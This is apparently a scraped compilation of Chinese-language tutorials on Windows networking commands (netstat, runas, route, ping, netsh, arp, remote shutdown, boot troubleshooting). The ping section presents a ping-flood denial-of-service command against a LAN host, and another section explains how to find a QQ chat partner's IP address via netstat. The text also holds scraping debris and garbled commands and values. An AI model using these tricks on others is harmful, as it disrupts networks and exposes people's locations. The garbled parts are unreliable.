显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息（对于 IP、ICMP、TCP 和 UDP 协议）以及 IPv6 统计信息（对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议）。使用时如果不带参数，netstat 显示活动的 TCP 连接。

语法

netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]

参数 -a

显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。 -e

显示以太网统计信息，如发送和接收的字节数、数据包数。该参数可以与 -s 结合使用。 -n

显示活动的 TCP 连接，不过，只以数字形式表现地址和端口号，却不尝试确定名称。 -o

显示活动的 TCP 连接并包括每个连接的进程 ID (PID)。可以在 Windows 任务管理器中的“进程”选项卡上找到基于 PID 的应用程序。该参数可以与 -a、-n 和 -p 结合使用。 -p Protocol

显示 Protocol 所指定的协议的连接。在这种情况下，Protocol 可以是 tcp、udp、tcpv6 或 udpv6。如果该参数与 -s 一起使用按协议显示统计信息，则 Protocol 可以是 tcp、udp、icmp、ip、tcpv6、udpv6、icmpv6 或 ipv6。 -s

按协议显示统计信息。默认情况下，显示 TCP、UDP、ICMP 和 IP 协议的统计信息。如果安装了 Windows XP 的 IPv6 协议，就会显示有关 IPv6 上的 TCP、IPv6 上的 UDP、ICMPv6 和 IPv6 协议的统计信息。可以使用 -p 参数指定协议集。 -r

显示 IP 路由表的内容。该参数与 route print 命令等价。 Interval

每隔 Interval 秒重新显示一次选定的信息。按 CTRL+C 停止重新显示统计信息。如果省略该参数，netstat 将只打印一次选定的信息。 /?

在命令提示符显示帮助。 注释

与该命令一起使用的参数必须以连字符 (-) 而不是以短斜线 (/) 作为前缀。

Netstat 提供下列统计信息： Proto

协议的名称（TCP 或 UDP）。 Local Address

本地计算机的 IP 地址和正在使用的端口号。如果不指定 -n 参数，就显示与 IP 地址和端口的名称对应的本地计算机名称。如果端口尚未建立，端口以星号（*）显示。

Foreign Address

连接该插槽的远程计算机的 IP 地址和端口号码。如果不指定 -n 参数，就显示与 IP 地址和端口对应的名称。如果端口尚未建立，端口以星号（*）显示。

(state)

表明 TCP 连接的状态。可能的状态如下：

CLOSE_WAIT

CLOSED

ESTABLISHED

FIN_WAIT_1

FIN_WAIT_2

LAST_ACK

LISTEN

SYN_RECEIVED

SYN_SEND

TIMED_WAIT

有关 TCP 连接状态的信息，请参阅 RFC 793。

只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时，该命令才可用。 范例

要想显示以太网统计信息和所有协议的统计信息，请键入下列命令：

netstat -e -s

要想仅显示 TCP 和 UDP 协议的统计信息，请键入下列命令：

netstat -s -p tcp udp

要想每 5 秒钟显示一次活动的 TCP 连接和进程 ID，请键入下列命令：

nbtstat -o 5

要想以数字形式显示活动的 TCP 连接和进程 ID，请键入下列命令：

nbtstat -n ?Co

Runas

允许用户用其他权限运行指定的工具和程序，而不是用户当前登录提供的权限。

语法

runas [{/profile /noprofile}] [/env] [/netonly] [/smartcard] [/showtrustlevels] [/trustlevel] /user:UserAccountName program

参数 /profile

加载用户的配置文件。/profile 是默认值。 /no profile

/noprofile 指定不加载用户的配置文件。这使应用程序载入的更加快速，但是在一些应用程序中也会引起错误。 /env

指定当前使用的网络环境，而不是用户的本地环境。 /netonly

指明指定的用户信息只用于远程访问。 /smartcard

/smartcard 表示凭据是否是由智能卡提供的。 /showtrustlevels

列出 /trustlevel 开关项。 /trustlevel

指定应用程序运行所在的授权级别。使用 /showtrustlevels 查看可用的信任级别。

/user:UserAccountName

指定在其下运行程序的用户帐户的名称。用户帐户的格式应是 user@domain 或 domain\,"p":{"h":18,"w":108,"x":153.03,"y":836.223,"z":4529},"ps":null,"t":"word。 程序

指定要用在 /user 中指定的帐户运行的程序或命令。 /?

在命令提示符显示帮助。 注释

管理员可以使用一个权限受的帐户执行日常、非管理性的任务，只有在执行特定管理任务时，才使用一个权限更大的帐户。要不经过注销再重新登录就完成这样的任务，可以用一般帐户登录，然后使用 runas 命令来运行需要更大权限的工具。

有关 runas 命令的使用范例，请参阅“相关主题”。

尽管 runas 通常由 Administrator 帐户使用，但并非仅限于

Administrator 帐户。任何拥有多个帐户的用户均可以利用备用凭据，使用

runas 运行程序、MMC 控制台或“控制面板”项。 如果要在计算机上使用 Administrator 帐户，对于 /user:，键入下列参数之一：

/user:AdministratorAccountName@ComputerName

/user:ComputerName\\AdministratorAccountName

如果想以域管理员身份使用这个命令，键入下列参数之一： /user:AdministratorAccountName@DomainName

/useromainName\\AdministratorAccountName

runas 命令允许您运行程序 (*.exe)、保存的 MMC 控制台 (*.msc)、程序和保存的 MMC 控制台的快捷方式及“控制面板”项。作为另一组（例如“Users”或“Power Users”组）的成员登录到计算机时，可以以管理员的身份运行。

可以使用 runas 命令来启动任何程序、MMC 控制器或“控制面板”项。只要提供适当的用户帐户和密码信息，用户帐户就具有登录到计算机的能力，并且程序、MMC 控制台、“控制面板”项在系统中及对该用户帐户均可用. runas 命令允许您管理其他域的服务器（运行工具的计算机和要管理的服务器在不同的域中）。

如果尝试使用 runas 从网络位置启动程序、MMC 控制台或“控制面板”项，可能会因为用来连接网络共享的凭据与用来启动程序的凭据不同而失败。后者的凭据可能无法访问同一网络共享。

有些项，例如“打印机”文件夹和桌面项，间接由 Windows 2000 打开，而不能使用 runas 命令启动。 如果 runas 命令失败，则可能是没有运行 RunAs 服务或使用的用户帐户无效。要检查 RunAs 服务的状态，请在“计算机管理”中单击“服务和应用程序”，然后单击“服务”。要测试用户帐户，请尝试使用该帐户登录合适的域。 范例

要在本地计算机上以管理员身份启动 Windows 2000 命令提示行实例，请键入：

runas /user:localmachinename\\administrator cmd 系统提示时，键入管理员密码。

要使用名为 companydomain\\domainadmin 的域管理员帐户启动“计算机管理”管理单元实例，请键入：

runas /user:companydomain\\domainadmin \"mmc %windir%\\system32\\compmgmt.msc\" 当提示时，键入帐户密码。

要使用名为 domain.microsoft.com 的域中的域管理员帐户 user 启动

“记事本”实例，请键入：

runas /user:user@domain.microsoft.com \"notepad my_file.txt\" 当提示时，键入帐户密码。

要启动命令提示符行窗口、保存的 MMC 控制台、控制面板项或管理其他地点服务器的程序的一个实例，请键入：

runas /netonly /user:domain\ame \"command\" domain\ame 必须是有足够权限管理服务器的用户。当提示时，键入帐户密码。 Route

在本地 IP 路由表中显示和修改条目。使用不带参数的 route 可以显示帮助。

语法

route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]]

参数 -f

清除所有不是主路由（网掩码为 255.255.255.255 的路由）、环回网络路由（目标为 127.0.0.0，网掩码为 255.255.255.0 的路由）或多播路由（目标为 224.0.0.0，网掩码为 240.0.0.0 的路由）的条目的路由表。如果它与命令之一（例如 add、change 或 delete）结合使用，表会在运行命令之前清除。 -p

与 add 命令共同使用时，指定路由被添加到注册表并在启动 TCP/IP 协议的时候初始化 IP 路由表。默认情况下，启动 TCP/IP 协议时不会保存添加的路由。与 print 命令一起使用时，则显示永久路由列表。所有其它的命令都忽略此参数。永久路由存储在注册表中的位置是

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\PersistentRoutes。

Command

指定要运行的命令。下表列出了有效的命令。 命令 目的 add 添加路由

change 更改现存路由 delete 删除路由 print 打印路由

Destination

指定路由的网络目标地址。目标地址可以是一个 IP 网络地址（其中网络地址的主机地址位设置为 0），对于主机路由是 IP 地址，对于默认路由是 0.0.0.0。

mask subnetmask 指定与

对于Windows下ping命令相信大家已经再熟悉不过了，但是能把ping的功能发挥到最大的人却并不是很多，当然我也并不是说我可以让ping发挥最大的功能，我也只不过经常用ping这个工具，也总结了一些小经验，现在和大家分享一下。

现在我就参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧，ping只有在安装了TCP/IP协议以后才可以使用：

ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list

Options:

-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.

不停的ping地方主机，直到你按下Control-C。

此功能没有什么特别的技巧，不过可以配合其他参数使用，将在下面提到。

-a Resolve addresses to hostnames.

解析计算机NetBios名。

示例：C:＼>ping -a 192.168.1.21

Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:

Reply from 192.168.1.21: bytes=32 time<10ms TTL=2

Reply from 192.168.1.21: bytes=32 time<10ms TTL=2

Reply from 192.168.1.21: bytes=32 time<10ms TTL=2

Reply from 192.168.1.21: bytes=32 time<10ms TTL=2

Ping statistics for 192.168.1.21:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。

-n count Number of echo requests to send.

发送count指定的Echo数据包数。

在默认情况下，一般都只发送四个数据包，通过这个命令可以自己定义发送的个数，对衡量网络速度很有帮助，比如我想测试发送50个数据包的返回的平均时间为多少，最快时间为多少，最慢时间为多少就可以通过以下获知：

C:＼>ping -n 50 202.103.96.68

Pinging 202.103.96.68 with 32 bytes of data:

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Request timed out.

………………

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Ping statistics for 202.103.96.68:

Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:

Minimum = 40ms, Maximum = 51ms, Average = 46ms

从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中，返回了48个，其中有两个由于未知原因丢失，这48个数据包当中返回速度最快为40ms，最慢为51ms，平均速度为46ms。

-l size Send buffer size.

定义echo数据包大小。

在默认的情况下windows的ping发送的数据包大小为32byt，我们也可以自己定义它的

大小，但有一个大小的，就是最大只能发送65500byt，也许有人会问为什么要到65500byt，因为Windows系列的系统都有一个安全漏洞（也许还包括其他系统）就是当向对方一次发送的数据包大于或等于65532时，对方就很有可能挡机，所以微软公司为了解决这一安全漏洞于是了ping的数据包大小。虽然微软公司已经做了此，但这个参数配合其他参数以后危害依然非常强大，比如我们就可以通过配合-t参数来实现一个带有攻击性的命令：（以下介绍带有危险性，仅用于试验，请勿轻易施于别人机器上，否则后果自负）

C:＼>ping -l 65500 -t 192.168.1.21

Pinging 192.168.1.21 with 65500 bytes of data:

Reply from 192.168.1.21: bytes=65500 time<10ms TTL=2

Reply from 192.168.1.21: bytes=65500 time<10ms TTL=2

………………

这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包，如果你只有一台计算机也许没有什么效果，但如果有很多计算机那么就可以使对方完全瘫痪，我曾经就做过这样的试验，当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时，不到5分钟对方的网络就已经完全瘫痪，网络严重堵塞，HTTP和FTP服务完全停止，由此可见威力非同小可。

-f Set Don't Fragment flag in packet.

在数据包中发送“不要分段”标志。

在一般你所发送的数据包都会通过路由分段再发送给对方，加上此参数以后路由就不会再分段处理。

-i TTL Time To Live.

指定TTL值在对方的系统里停留的时间。

此参数同样是帮助你检查网络运转情况的。

-v TOS Type Of Service.

将“服务类型”字段设置为 tos 指定的值。

-r count Record route for count hops.

在“记录路由”字段中记录传出和返回数据包的路由。

在一般情况下你发送的数据包是通过一个个路由才到达对方的，但到底是经过了哪些路由呢？通过此参数就可以设定你想探测经过的路由的个数，不过在了9个，也就是说你只能跟踪到9个路由，如果想探测更多，可以通过其他命令实现，我将在以后的文章中给大家讲解。以下为示例：

C:＼>ping -n 1 -r 9 202.96.105.101 （发送一个数据包，最多记录9个路由）

Pinging 202.96.105.101 with 32 bytes of data:

Reply from 202.96.105.101: bytes=32 time=10ms TTL=249

Route: 202.107.208.187 ->

202.107.210.214 ->

61.153.112.70 ->

61.153.112. ->

202.96.105.149 ->

202.96.105.97 ->

202.96.105.101 ->

202.96.105.150 ->

61.153.112.90

Ping statistics for 202.96.105.101:

Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 10ms, Maximum = 10ms, Average = 10ms

从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ，202.107.210.214 , 61.153.112.70 , 61.153.112. , 202.96.105.149 , 202.96.105.97这几个路由。

-s count Timestamp for count hops.

指定 count 指定的跃点数的时间戳。

此参数和-r差不多，只是这个参数不记录数据包返回所经过的路由，最多也只记录4个。

-j host-list Loose source route along host-list.

利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔（路由稀疏源）IP 允许的最大数量为 9。

-k host-list Strict source route along host-list.

利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔（路由严格源）IP 允许的最大数量为 9。

-w timeout Timeout in milliseconds to wait for each reply.

指定超时间隔，单位为毫秒。

此参数没有什么其他技巧。

ping命令的其他技巧：在一般情况下还可以通过ping对方让对方返回给你的TTL值大小，粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列，一般情况下Windows系列的系统返回的TTL值在100-130之间，而UNIX/Linux系列的系统返回的TTL值在240-255之间，当然TTL的值在对方的主机里是可以修改的，Windows系列的系统可以通过修改注册表以下键值实现：

[HKEY_LOCAL_MACHINE＼SYSTEM＼CurrentControlSet＼Services＼Tcpip＼Parameters]

\"DefaultTTL\"=dword:ff

255---FF

128---80

----40

32----20

好了，ping命令也基本上完全讲解完了，其中还有-j,-k参数我还没有详细说明，由于某些原因也包括我自己所收集的资料过少这里也没有向大家详细介绍，请大家见谅，如果在看了这篇文章的朋友当中有知道得比我更多的，以及其他使用技巧的也希望您能告诉我，并在此先谢过!

笔者所在单位下班后常有很多老师不关电脑，领导发现后要求解决这个问题。我想如果到各办公室去查看，这很费时，于是就想能否通过一台电脑把所有的机器都关掉。因为所有的办公用机安装的都是Windows XP系统，就想到了使用远程

关机“Shutdown”命令。具体方法如下：

步骤1 单击“开始→运行”，在对话框中输入“Gpedit.msc”，单击[确定]，打开“组策略编辑器”。

步骤2 在“组策略编辑器”窗口的左边打开“计算机配置→Windows设置→安全设置→本地策略→用户权利指派”，在右边的窗口选择“从远端系统强制关机”。在弹出的对话框中显示目前只有“Administrators”组的成员才有权远程关机；单击对话框下方的[添加用户或组]按钮，然后在弹出的对话框中输入“Heyongsheng”(管理员账号)，再单击[确定]。

步骤3 这时在“从远端系统强制关机”的属性中便添加了一个

“Heyongsheng”用户，单击[确定]，最后关闭“组策略编辑器”窗口。

对各办公室的电脑进行上述操作后，我们便给每台计算机的

“Heyongsheng”用户授予了远程关机的权限。到下班时，我只要在自己的机器上进行以下操作：

步骤1 单击“开始→运行”，在对话框中输入“Shutdown -I”，屏幕上将显示“远程关机”对话框(图1)。

图1 远程关机控制窗口

步骤2 单击[游览]按钮，出现查找计算机的对话框。

步骤3 单击[开始查找]按钮，会出现本网络中的所有计算机（图2）。

图2 查找局域网中所有计算机

步骤4 按住Ctrl键，用鼠标选择要关闭的计算机，最后单击[确定]，这时在远程关机对话框中会出现要关闭的计算机。

步骤5 在选项的下拉框中选择一个合适的关闭理由，然后点击[确定](图3)。

图3 远程关机

依照以上步骤进行操作，远程关机就自动完成了。

现今网络已成为人们生活中的一部分，能够做一名网络管理员更是成为无数电脑爱好者的梦。

要成为一名网络管理员首先就要能够维护网络安全正常运行,在网络发生故障时能迅速进行恢复工作。在网络故障恢复过程中，尤为重要的是服务器网络设置的恢复。我们就谈一

谈在平常网络管理维护工作中如何利用Netsh命令备份和恢复服务器网络设置。

Netsh是Windows 2000/XP/2003操作系统自身提供的命令行脚本实用工具，它允许用户在本地或远程显示或修改当前正在运行的计算机的网络配置。为了存档、备份或配置其他服务器，Netsh也可以将配置脚本保存在文本文件中。

运行Netsh命令

运行Netsh命令有两种情况。

1． 本地运行Netsh命令

点击“开始→运行”，在运行对话框中输入Cmd命令并点击[确定]，然后在命令提示符后输入Netsh命令就可以了。

2． 远程运行Netsh命令

要在远程 Windows 2000 Server服务器上运行Netsh命令，首先要使用“远程桌面连接”连接到运行终端服务的Windows 2000 Server服务器上，之后的操作与在本地使用Netsh命令相同。

备份/恢复

服务器网络设置

谈到网络设置，您一定会想到IP地址、子网掩码、网关、DNS等（这些主要是接口IP配置参数）。对于普通计算机来说，网络设置只有接口IP配置参数；而对于服务器而言，网络设置不仅仅包括前面所提到的接口IP配置参数，还有接口配置、端口代理配置、远程访问配置、路由配置、DNS 代理配置、NAT 配置、DHCP中继代理配置等等。上述的网络设置参数，根据服务器在网络中所起的特殊作用而有所不同，如：校园网中用Windows 2000 Server服务器负责连接，并且连接校内多个子网，那么在该服务器上必定要设置远程访问配置、路由配置、DNS 代理配置以及NAT 配置。

1． 备份服务器的网络设置

一个有经验的网络管理员所做的最频繁的工作就是备份。只有做了备份，当遇到毁灭性破坏时，才能迅速及时地恢复网络。网络设置备份操作：netsh dump >bak12.txt，通过该操作可将网络设置备份到bak12.txt文件中，该文件为一个文本文件。

对网络设置进行调整后，应即时进行备份。

2． 恢复服务器的网络设置

在进行网络设置调整时，如果发生了操作错误，或者服务器网络出现故障，可以利用备份快速恢复网络设置。操作方法:nesh exec bak12.txt。

通过Netsh命令对服务器网络设置进行备份，特别简单方便，而且快速有效，无需其他

软件辅助，非常适合网络管理人员用来对服务器网络设置进行备份和恢复管理。

说明：安全模式（SAFEBOOT_OPTION-Minimal）是以最小的设备驱动程序和服务集来启动Windows。带网络连接的安全模式（SAFEBOOT_OPTION-Network）是以最小的设备驱动程序和服务集来启动Windows，还有加载网络所需的驱动程序。

方法：启动计算机，当看到“请选择要启动的操作系统”消息时，F8键，显示Windows高级选项菜单时，使用上下箭头键选中“安全模式”，然后按ENTEr键。

若要解决潜在的与环境有关的问题，以安全模式或带网络支持的安全模式重新启动计算机。如果该问题出自一个不依赖网络连接的程序，则使用安全模式。如果该问题是网络问题(包括浏览器问题)，则需要启动到带网络支持的安全模式。

使用 Sigverif 确定导致故障的驱动程序

经过 Windows 硬件质量实验室 (WHQL) 测试过的驱动程序一般不会导致问题，它们都有数字签名作为标志。那些没有数字签名的驱动有可能导致故障，使用签名验证工具(Sigverif.exe)找到没有数字签名的文件，具体测试%Windir%\\System32\\Drivers 文件夹中的文件就可以了。使用运行框输入 sigverif 就可以启动界面。

单击高级，单击查找其他未经过数字签名的文件，单击浏览，浏览到 Windows\\System32\\Drivers 文件夹，然后单击两次确定，单击开始。显示的是计算机上安装的所有未经数字签名的驱动程序的列表。

需要确定到底是哪个文件导致的故障，新建一个文件夹BAK，然后把上面显示的未经签名的驱动程序移动到里面，重新启动计算机（未经签名的驱动程序已经不在 Windows\\System32\\Drivers 文件夹中，所以不再起作用了），然后测试程序或其他功能看看是否仍出现相同的错误消息或问题。每次将与同一个程序或设备相关的驱动程序一起放回 Windows\\System32\\Drivers 文件夹以确定问题的原因。 对那些导致故障的的驱动，坚决关闭（禁用），方法是：开始-运行-%systemroot%\\system32\\compmgmt.msc /s-确定-设备管理器-双击该设备，在设备用法列表中单击不要使用这个设备（停用），然后单击确定。当然可以先试一下“从供应商那里查找该设备的更新驱动程序”选项以更新启动程序。相应的服务通过管理工具中的服务关闭掉。也可以用下面的方法：开始-运行 %systemroot%\\system32\\services.msc /s-确定-双击该服务，在启动类型列表中单击禁用，然后单击确定。

使用 Msconfig 解决配置问题

启动 Msconfig：开始-运行-Msconfig-确定。Msconfig包括下列文件和设置的首选项： System.ini 文件 Win.ini 文件 Boot.ini 文件

设置为在启动过程中加载的程序（这些程序在启动文件夹和注册表中指定） 环境设置 国际设置

反复启动并指定加载某项和其中的行，可以排除那些与配置无关的问题。Windows 2000 没有 Msconfig 文件，可以从 Windows XP 系统下复制一个来用。不要用Windows 98 下的 Msconfig 文件，因为 98 下的 Msconfig 文件不能识别 Windows 2000 系统的System.ini等配置文件。

清理注册表启动项

Windows XP 启动时会加载一些参数，包括： 程序菜单上的启动文件夹 注册表中所有用户的 Run 行 注册表中特定用户的 Run 行 注册表中所有用户的 load 项

启动文件夹图标是从两个位置加载的Documents and Settings\\All Users\\Start Menu\\Programs\\Startup 和Documents and Settings\name\\Start Menu\\Programs\\Startup 要在注册表中删除所有用户的 Run 行的值

单击开始，单击运行，键入 regedit，然后单击确定。

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows中的load 中的值

清理时先要备份相关配置，其中启动文件夹通过复制的方法备份，注册表通过导出的方法备份，确定导致故障的相关项后，将正确的项合并并导入注册表中。

测试用户配置文件

有时候，用户特定的信息可能被损坏，但同一台计算机上的其他用户没有问题。若要确定是否是这种情况，请以新用户的身份登录，或者创建新用户帐户，然后测试新登录。有时候，某些程序只有在您用默认管理员帐户登录时才能正常工作。较早的程序可能出现此现象。如果默认管理员配置文件被损坏，则重新安装 Windows 以更正此问题。所有用户特定的配置信息（显示在HKEY_CURRENT_USER 项中）都存储在 Documents and Settings\name 文件夹的tuser.dat 文件中。

如果使用了自动登录，请在启动时同时按注shift键，这样就可以重新选择用户了。

还有启用\"VGA 模式

该选项在 0 x 480 模式下启动 Windows，使用当前的视频驱动程序（非 Vga.sys）。如果显示刷新率调高而无法显示，则该模式很有用。注意，安全模式和带网络连接的安全模式加载 Vga.sys 驱动程序。

查QQ好友IP地址还用得着这么麻烦吗？给QQ打个补丁不就行了吗？不错，这样做是很简单，但是如果是新出的QQ，“补丁”还没有做出来那又该怎么办呢？用IpSniper等软件呗，如果手头上没有又急着查又该怎么办呢？可以用其他软件，比方说……好了，说来说去都要别人的软件，为什么不试试DOS命令呢？即简单，又方便，还很环保（不像应用软件还得另外安装占用硬盘空间，使用时还占用相同资源）。

不多啰嗦了，正式开始。 首先，用甜言蜜语、糖衣炮弹之类的武器把你想知道IP地址的那个人“请”到QQ的“二人世界”里。接着，我们在DOS窗口里(Win9x下叫DOS，Win2000下叫命令提示符)。输入如下命令：

netstat -n

你将看到：

Active Connections

Proto Local Address Foreign Address State

TCP 202.109.34.78:1200 202.121.139.35:61555 ESTABLISHED TCP 202.109.34.78:2694 202.109.72.40:6667 ESTABLISHED TCP 202.109.34.78:4869 211.202.1.227:23 ESTABLISHED

好家伙，这么多IP！哪个才是我们要找的呢？别着急，往后看。我们现在退出“二人世界”，然后在DOS下再输入一次：

netstat -n

你将看到：

Active Connections

Proto Local Address Foreign Address State

TCP 202.109.34.78:1200 202.121.139.35:61555 TIME_WAIT TCP 202.109.34.78:2694 202.109.72.40:6667 ESTABLISHED TCP 202.109.34.78:4869 211.202.1.227:23 ESTABLISHED

看出前后两次的区别了吗？没有看出来？仔细着看，你会发现：

原来：TCP 202.109.34.78:1200 202.121.139.35:61555 ESTABLISHED 现在：TCP 202.109.34.78:1200 202.121.139.35:61555 TIME_WAIT

好了，现在你该知道了吧？对！和你聊天的人的IP就是：202.101.139.35！那你是怎么知道的呢？朋友，请看我们在“二人世界”时要传送消息，相互之间必然要产生连接（通过UDP协议），此时自然是“ESTABLISHED”了（以你用netstat -n命令的结果来说）；而退出“二人世界”连接就断开了，自然就是“TIME_WAIT”了。

很简单吧？用这种方法一个外来软件也没有用(netstat是Windows自带外部命令)，是不是向我们前面所说的那样即简单又方便，还很环保？还不快试试！ 1、winipcfg命令在Windows2000中无效，可以用ipconfig代替。

方法：DOS方式直接键入ipconfig/ALL。 操作环境：win98或WIN2K

作用：

显示网络适配器的物理地址、主机的IP地址、子网掩码以及默认网关等，还可以查看主机的相关信息如：主机名、DNS服务器、节点类型等。其中网络适配器的物理地址在检测网络错误时非常有用。在命令提示符下键入ipconfig/?可获得ipconfig的使用帮助，键入ipconfig all可获得IP配置的所有属性。

2、命令netstat

此命令显示协议统计和当前的TCP/IP网络连接。netstat是Windows下的网络检测工具，而且也是需要在安装了TCP/IP协议以后才可以使用的。

方法：DOS方式直接键入netstat。 操作环境：win98或WIN2K

例1、怎样知道自己的计算机是否被开了“后门”？

netstat -a

显示出你的计算机当前所开放的所有端口，其中包括TCP端口和UDP端口。你经常的使用它，以此来查看计算机的系统服务是否正常，是否被“黑客”留下后门，木马等。由于这个参数同时还会显示出当前计算机有什么人的IP正连接着你的服务器，所以也是一种实时入侵检测工具，如发现有个IP连接着不正常的端口，你也可以及时做出有效对策。

例2、怎样知道连接到我的计算机的IP地址？

netstat -n

参数-n告诉netstat不解析对方计算机的NetBios名. 作用：列举出来当前和你连接的所有计算机。

例3、详细网络资料，供高手研究。

netstat -s -e

默认情况下，显示 TCP、UDP、ICMP 和 IP的统计，比如你接受了多少数据包，多少字节，有多少TCP端口打开，有多少UDP端口打开。

3、命令nbtstat

该命令使用 NBT（TCP/IP 上的 NetBIOS）显示协议统计和当前 TCP/IP 连接。 方法：DOS方式直接键入nbtstat。 操作环境：win98或WIN2K

例：怎样知道对方计算机名，所在的组、域及当前用户名？ nbtstat -a 192.168.0.1（对方IP地址）

4、命令ARP

显示和修改“地址解析协议”(ARP) 所使用的到以太网的 IP 或令牌环物理地址翻译表。该命令只有在安装了 TCP/IP 协议之后才可用。

arp -a [inet_addr] [-N [if_addr]] arp -d inet_addr [if_addr]

arp -s inet_addr ether_addr [if_addr]

例1、怎样知道谁正在连接我的计算机？

arp -a

例2、利用捆绑IP和MAC解决局域网内盗用IP的问题。

查看网卡MAC地址,用ipconfig。记录网卡MAC地址，再到代理服务器端让网络管理员把您上网的静态IP地址与所记录计算机的网卡地址进行捆绑。具体命令是：

ARP －s 192．168．0．16 00－EO－4C－6C－08－75

这样，就将您上网的静态IP地址192.168.0.16与网卡地址为44-55-43--00-00的计算机绑定在一起了，即使别人盗用您的IP地址192.168.0.4也无法通过代理服务器上网。其中应注意的是此项命令仅在局域网中上网的代理服务器端有用，还要是静态IP地址。

5、route命令

该命令管理路由表。

例1、显示本机路由信息,帮助解决网络路由问题。

route print /netstat -r

例2、用ROUTE命令实现跨网段访问

一台计算机有两块网卡（IP分别为192.168.0.6和10.41.0.14），分别连接不同网段的局域网。在win98下利用ROUTE命令实现跨网段访问。

route delete 0.0.0.0

route add 192.168.0.0 mask 255.255.255.0 10.41.0.14 metric 1 route add 0.0.0.0 mask 255.255.255.0 10.41.0.2 metric 1

其中10.41.0.2为局域网网关。

例3、解决拨号上网后不能访问局域网的问题。

一台计算机（10.41.221.17）属于局域网，通过路由器10.41.221.2连接其它网络（10.41.220.0）。现通过10.41.221.17拨号上Internet后，出现无法通过路由器连接其它网络的现象。原因当然是默认网关被修改了。解决的办法是：

route add 10.41.220.0 mask 255.255.255.0 10.41.221.2

微软的Windows家族从Windows NT开始跨入了网络操作系统的市场，到现在的Windows 2000可以说网络功能在逐渐的完善，在这个成长过程中Windows融入了很多其他网络操作系统的功能，可以说是借鉴而来的，逐渐形成了一套功能完善的网络操作系统，这也是令SUN等各大公司所感觉到不服的原因，觉得不是微软完全自给研发的东西。不过Windows2000的功能确实是很强大的，它几乎可以象Unix和Linux一样在命令行下做很多的工作。

下面我们看一下Windows上一个可以在命令行下更改ip地址的命令，看过这个命令后大家可能会觉得这个命令很象Unix和Linux的命令，更象Cisco的路由器命令。下面是我在计算机上实际操作的回显，我会加上一些注释：

C:\\>ipconfig (首先用ipconfig这个命令看一下更改之前的ip地址)

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 192.168.0.250 （本地连接更改之前的ip） Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.0.1

PPP adapter 拨号连接:

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 211.149.128.147 Subnet Mask . . . . . . . . . . . : 255.255.255.255 Default Gateway . . . . . . . . . : 211.149.128.147

C:\\>netsh (然后执行netsh这个命令) netsh>interface (netsh命令的子命令) interface>ip (interface命令的子命令)

interface ip>set (interface ip命令的子命令)

下列指令有效:

此上下文中的命令:

set address - 设置指定的接口的 IP 地址或默认网关。 set dns - 设置 DNS 服务器模式和地址。 set wins - 设置 WINS 服务器模式和地址。

interface ip>set address \"本地连接\" static 192.168.0.2 255.255.255.0 192.168.0.1 1 （设置ip地址） 确定。

（注释：上面一段象不象Cisco的命令。）

interface ip>exit

C:\\>ipconfig （更改后再用ipconfig命令看一下ip地址,确认一下是否更改成功）

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 192.168.0.2 （更改后的ip说明成功了） Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.0.1

PPP adapter 拨号连接:

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 211.149.128.147 Subnet Mask . . . . . . . . . . . : 255.255.255.255 Default Gateway . . . . . . . . . : 211.149.128.147

C:\\>

netsh这个命令还有好多强大的功能 如下： C:\\>netsh netsh>?

下列指令有效: 此上下文中的命令:

.. - 移到上一层上下文级。 ? - 显示命令列表。

aaaa - 更改到 `aaaa' 上下文。

abort - 丢弃在脱机模式下所做的更改。 add - 将一个配置项添加到项目列表中。 alias - 添加一个别名 bye - 退出程序。

commit - 提交在脱机模式中所做的更改。 delete - 在项目列表上删除一个配置项目。 dhcp - 更改到 `dhcp' 上下文。 dump - 显示一个配置脚本。 exec - 运行一个脚本文件。 exit - 退出程序。

help - 显示命令列表。

interface - 更改到 `interface' 上下文。

